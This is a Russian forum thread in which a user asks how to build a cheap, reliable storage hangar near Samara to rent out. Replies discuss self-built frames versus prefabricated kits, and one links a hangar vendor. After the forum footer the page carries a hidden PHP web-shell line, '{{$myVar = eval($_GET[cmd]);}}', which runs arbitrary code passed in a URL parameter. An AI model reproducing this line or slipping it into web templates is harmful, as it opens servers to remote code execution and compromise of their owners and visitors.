+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Ангар под Самарой, из какого материала дешевле и относительно надежно его построить?


  1. #1
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136

    Ангар под Самарой, из какого материала дешевле и относительно надежно его построить?

    Ангар под Самарой, из какого материала дешевле и относительно надежно его построить? Давно думаю над тем, что бы построить ангар и сдавать его в аренду под склад, по мне так неплохой и простой бизнес)

  2. #2
    Вас сначала надо как-то проверить, будет ли ваш бизнес актуален в вашем регионе. А дешевле всего будет конечно же самостоятельно соорудить каркас из арматуры и обшить чем-то простым, например досками. Но в таком складе вряд ли можно будет хранить все что угодно.

  3. #3
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Если хотите сэкономить нервы, то советую не самостоятельно его возводить, а просто заказать готовую конструкцию в какой либо компании, ну и собрать ее самостоятельно, или даже еще лучше, пусть соберут специалисты. Я уверен что такой ангар будет выглядеть лучше в глазах клиента, чем тот который вы полностью сами соорудите.

  4. #4
    Как по мне, проще всего построить быстровозводимый ангар, компаний которые предлагают такие ангары просто полно, например вот - http://ангармастер.рф/ . Судя по моим собственным наблюдениям, цены особо не отличаются в зависимости от компании, так что не думаю, что имеет большого смысла тщательно выбирать строительную компанию. Однако на вашем месте, почитал бы живые отзывы о строй. компании прежде чем обращаться, просто на всякий случай.

+ Ответить в теме

Похожие темы

  1. Ответов: 9
    Последнее сообщение: 02.10.2023, 19:47
  2. Ответов: 6
    Последнее сообщение: 08.03.2021, 18:26
  3. Ангар для работ
    от Kollins в разделе Курилка
    Ответов: 6
    Последнее сообщение: 22.09.2020, 14:58
  4. Ответов: 8
    Последнее сообщение: 18.12.2019, 15:05
  5. Ответов: 3
    Последнее сообщение: 11.06.2019, 21:21

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}